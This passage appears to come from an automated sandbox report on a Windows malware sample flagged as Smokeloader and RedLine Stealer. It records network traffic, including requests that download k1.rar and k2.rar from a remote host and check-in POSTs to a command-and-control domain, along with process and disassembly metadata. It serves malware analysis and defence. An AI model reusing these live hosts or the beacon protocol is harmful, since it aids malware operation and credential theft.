Jul 25, 2024 00:25:50.279130936 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:50.279146910 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 25, 2024 00:25:50.279223919 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 25, 2024 00:25:51.290215015 CEST	49733	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:51.296961069 CEST	799	49733	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:51.297101974 CEST	49733	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:51.297482014 CEST	49733	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:25:51.304514885 CEST	799	49733	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:51.713186026 CEST	799	49733	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:51.713248968 CEST	799	49733	44.221.84.105	192.168.2.4
Jul 25, 2024 00:25:51.713349104 CEST	49733	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:26:05.265856981 CEST	49733	799	192.168.2.4	44.221.84.105
Jul 25, 2024 00:26:20.885951042 CEST	49732	443	192.168.2.4	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 00:25:46.594927073 CEST	53900	53	192.168.2.4	1.1.1.1
Jul 25, 2024 00:25:46.690985918 CEST	53	53900	1.1.1.1	192.168.2.4
Jul 25, 2024 00:25:48.931175947 CEST	62562	53	192.168.2.4	1.1.1.1
Jul 25, 2024 00:25:48.946924925 CEST	53	62562	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 00:25:46.594927073 CEST	192.168.2.4	1.1.1.1	0x75a6	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 00:25:48.931175947 CEST	192.168.2.4	1.1.1.1	0xe7c	Standard query (0)	sofahuntingslidedine.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 00:25:46.690985918 CEST	1.1.1.1	192.168.2.4	0x75a6	No error (0)	ddos.dnsnb8.net	44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 25, 2024 00:25:48.946924925 CEST	1.1.1.1	192.168.2.4	0xe7c	No error (0)	sofahuntingslidedine.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 00:25:48.946924925 CEST	1.1.1.1	192.168.2.4	0xe7c	No error (0)	sofahuntingslidedine.shop	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sofahuntingslidedine.shop

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.221.84.105	799	7452	C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 00:25:46.723144054 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	44.221.84.105	799	7452	C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 00:25:51.297482014 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.96.3	443	7436	C:\Users\user\Desktop\current[1].exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 22:25:49 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sofahuntingslidedine.shop
2024-07-24 22:25:49 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-24 22:25:49 UTC	561	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 22:25:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=seOKxeXmgw3WOTpmJ8r%2BD2ReZG0%2FGNynOFoygy04bb2eSS0aICmVu%2BOt1VBIG0ql61TS02JCBla4PkJ23uNe%2BGGlakKk8VJ%2B6ggVAmHWyZGmP6Su5t44H2RgPsq0glusfDP8F0TnSobOpBCu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a87540cc83ac329-EWR
2024-07-24 22:25:49 UTC	808	IN	Data Raw: 31 31 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1128<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-07-24 22:25:49 UTC	1369	IN	Data Raw: 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 Data Ascii: gi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElement
2024-07-24 22:25:49 UTC	1369	IN	Data Raw: 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 5f 32 53 4e 6a 49 44 5f 7a 6d 51 34 74 4d 4c 67 75 74 75 31 36 7a 4a 38 53 54 53 59 4f 71 59 76 47 44 63 6d 6e 72 53 57 70 59 6f 2d 31 37 32 31 38 35 39 39 34 39 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 64 64 6f 73 2f 67 6c 6f 73 73 61 72 79 2f 6d 61 6c 77 61 72 65 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 Data Ascii: text/plain"> <input type="hidden" name="atok" value="_2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-bt
2024-07-24 22:25:49 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-07-24 22:25:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.96.3	443	7436	C:\Users\user\Desktop\current[1].exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 22:25:50 UTC	362	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=_2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: sofahuntingslidedine.shop
2024-07-24 22:25:50 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=default

Target ID:	0
Start time:	18:25:45
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\current[1].exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\current[1].exe"
Imagebase:	0x400000
File size:	512'512 bytes
MD5 hash:	CD7329155530FB805ABB2CACE9B32134
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:25:45
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
Imagebase:	0xe90000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:25:50
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624
Imagebase:	0x850000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:26:20
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1504
Imagebase:	0x850000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	34.2%
Signature Coverage:	47.4%
Total number of Nodes:	76
Total number of Limit Nodes:	2

Executed Functions

Function 00424A2F Relevance: 7.1, Strings: 5, Instructions: 842
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n[R, xrefs: 0042528F
N7R, xrefs: 00424DA3
lG, xrefs: 004258BB
n[R, xrefs: 00424B53
N7R, xrefs: 00425515

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: N7R$N7R$lG$n[R$n[R
API String ID: 0-1547658646
Opcode ID: bd8cd49e501a92727a20c6e6481543b834b132b12b5d8f84ad9c0c6c4e006fec
Instruction ID: 7d43e97beaf10dd241c542a2bf3fca4b63e8c24b527479267c47e933462aeb7a
Opcode Fuzzy Hash: bd8cd49e501a92727a20c6e6481543b834b132b12b5d8f84ad9c0c6c4e006fec
Instruction Fuzzy Hash: A6A2B9B5A01B018FD358CF26C584B92FBE6BF98310F5686AEC55D8B722C770A851CF94

Function 004238A0 Relevance: 4.4, Strings: 3, Instructions: 644
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

name="atok" value=", xrefs: 004238C7, 0042401B
act=life, xrefs: 00423A03, 00423B09
_2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/api, xrefs: 00424145

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: _2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/api$act=life$name="atok" value="
API String ID: 0-102919772
Opcode ID: 6f1c11e05279e1b72c2fe9921da996a91aa81acd12ab72277d5bd514fee0d250
Instruction ID: d345d5d40c2238aa36ac180ccc86c0d43f8f9005a2342fa468655178718fe39d
Opcode Fuzzy Hash: 6f1c11e05279e1b72c2fe9921da996a91aa81acd12ab72277d5bd514fee0d250
Instruction Fuzzy Hash: C3523670600B408FD320CF2AD884652BBF1FF5A310B55896ED4EA9B762E674F846CF56

Function 0045EAE9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 0045EC0F

Strings

(`&2, xrefs: 0045EB20

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: SectionView
String ID: (`&2
API String ID: 1323581903-119292233
Opcode ID: 679fb0d24ba7ba67619b139a73fac3bb2566138ae30a3bea7804ab5c370cd933
Instruction ID: d15f27496d6787c8767d27e8c637e654cfb8d8b10a0ce7fa73633f48adc603f4
Opcode Fuzzy Hash: 679fb0d24ba7ba67619b139a73fac3bb2566138ae30a3bea7804ab5c370cd933
Instruction Fuzzy Hash: 9A5140B4500B009FD368CF1AC580A02FBF2BF98714B25CA5DD59A8BB65D371F8468F90

Function 0045EFF5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0045F067

Strings

j4K, xrefs: 0045F069

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: Close
String ID: j4K
API String ID: 3535843008-3760585739
Opcode ID: 51458d053b5ca168221a2187cae520825723fa6d7943e5d10fd5ca07335a2cd2
Instruction ID: 46e5048a994442b589c07434ed9c51864a0e97fa9984ace10c16c01c488c29ac
Opcode Fuzzy Hash: 51458d053b5ca168221a2187cae520825723fa6d7943e5d10fd5ca07335a2cd2
Instruction Fuzzy Hash: 55115DB5500B008FC364CF25D590912FBF6FF9862075A9A5ED88A9BB21C770F846CF64

Function 00462440 Relevance: 3.2, APIs: 2, Instructions: 180
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00462644
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0046268E

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: fa838aa857a7355dfac20365d38a4d469ccdcfd3743e2f89c58829df0c38d651
Instruction ID: d394bcc13ac6a19d2a26916b0a2a8d7f185cd15028363b67db23379ffc64aa24
Opcode Fuzzy Hash: fa838aa857a7355dfac20365d38a4d469ccdcfd3743e2f89c58829df0c38d651
Instruction Fuzzy Hash: B061EA75505291DFCB01CFA8EC506E63FF0E71A314F1440B6E9989B3A3D2358A89DBAD

Function 00460A90 Relevance: 3.2, APIs: 2, Instructions: 167
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00460C81
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00460CB6

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 3e57522c6236cb9eb8d2c73fc35ca49fe59ff0836f2554eec90ba2db64fd4e8a
Instruction ID: f17ac9f07a3f5e6cd698c8bc67c0247d9a90bf5fea587ace7855c064486d42cb
Opcode Fuzzy Hash: 3e57522c6236cb9eb8d2c73fc35ca49fe59ff0836f2554eec90ba2db64fd4e8a
Instruction Fuzzy Hash: EB61D8305042D0EFC711CF78AC906A63FF1AB1A314F1855AAE898CB3E3D23495C6DB69

Function 0042E700 Relevance: 3.2, APIs: 2, Instructions: 156
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 0042E8D8
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 0042E904

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 71f6e86ffacd0548d6bba9f8ee20af51021e52754e834e4faf38ca489d76619c
Instruction ID: c4524e4b790e7436e2a054073eb25119dbc3822621974b00d8154a34f68a9af5
Opcode Fuzzy Hash: 71f6e86ffacd0548d6bba9f8ee20af51021e52754e834e4faf38ca489d76619c
Instruction Fuzzy Hash: 7951A4715142D0DEC7128F79AC506A63FF0D71B314B04817EE890CB3A2EFA49B85D7AA

Function 00460870 Relevance: 3.2, APIs: 2, Instructions: 154
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00460A48
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00460A77

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 22a063ee9cfaf9687a06337ea285cac12854b57cd12183167d47ce8725ebd8d9
Instruction ID: 492944118db45f381c6c09125d911d4dee061bd4015c9580bb8cfda1f6df1237
Opcode Fuzzy Hash: 22a063ee9cfaf9687a06337ea285cac12854b57cd12183167d47ce8725ebd8d9
Instruction Fuzzy Hash: 295189712052D09FC721CF79AC906AA7FF2A71B310B14416EE4989B3E2D2349589DB69

Function 00462990 Relevance: 3.2, APIs: 2, Instructions: 154
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000040), ref: 00462B5D
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00462B9F

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: cfa9515b61953420c96f8dd4f64e01773a0d28440bb3b159d1613e10c133c5e1
Instruction ID: d6c4667fbf9fbcf58161f7c581fb2baf7e01f9b9e84310ac2b273d70d24a3709
Opcode Fuzzy Hash: cfa9515b61953420c96f8dd4f64e01773a0d28440bb3b159d1613e10c133c5e1
Instruction Fuzzy Hash: CB51D538105690AFCB01CF34BC516A53FF4A71A310B0841FAE9AC5B3E3C2265589DB29

Function 0082F056 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0082F07E
Module32First.KERNEL32(00000000,00000224), ref: 0082F09E

Memory Dump Source

Source File: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0082E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82e000_current[1].jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2a7c89ca2f3172875c16294e354de3b038b89ceaa09c8906203c4395a696d76b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D6F04F35100B256BD7202AF9A889A6A76F8FF59725F100578E642D10C2DB70E8858A61

Function 00422DE0 Relevance: 1.9, Strings: 1, Instructions: 671COMMON

Download Yara Rule

Strings

sofahuntingslidedine.shop, xrefs: 00423882

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: sofahuntingslidedine.shop
API String ID: 0-2550364547
Opcode ID: a9a170b837e783444c69dea4d9a06bba62694816eaa415ea23f3c67bb89af6fe
Instruction ID: f4574ce6c26b87415fe508c8772d6fa865633ff4892d451fef1b01f0a66f4216
Opcode Fuzzy Hash: a9a170b837e783444c69dea4d9a06bba62694816eaa415ea23f3c67bb89af6fe
Instruction Fuzzy Hash: 43727CB59083818FC364CF19D48069BFBE5BFD8710F55892EE899AB321D770A845CF92

Function 00425FCA Relevance: 1.8, Strings: 1, Instructions: 590COMMON

Download Yara Rule

Strings

sofahuntingslidedine.shop, xrefs: 00426403, 00426848

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: sofahuntingslidedine.shop
API String ID: 0-2550364547
Opcode ID: 9b48636173ca570ace028cc0653ef31db6f0515e93024170db6b7addb60e7e68
Instruction ID: 6276e2e0b0e20a543ad59dea2aa8cabf649e859dee9aefceb047f3c040e16f21
Opcode Fuzzy Hash: 9b48636173ca570ace028cc0653ef31db6f0515e93024170db6b7addb60e7e68
Instruction Fuzzy Hash: 7F624FB4A05B019FD368CF2AD190A52FBF1BF8C310B51896ED59A8BB61D730B855CF84

Function 0045E927 Relevance: 1.6, APIs: 1, Instructions: 98nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000004,?), ref: 0045EA2F

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID: OpenSection
String ID:
API String ID: 1950954290-0
Opcode ID: 791ce470d7e6fafb9f26df2f5f49c5e99a77c8202bf27ce2e10e87735bd72cce
Instruction ID: 5ccbd8a05f05c690074c22b775deea232cbbbb256677916fa113bcb1b9cc15c9
Opcode Fuzzy Hash: 791ce470d7e6fafb9f26df2f5f49c5e99a77c8202bf27ce2e10e87735bd72cce
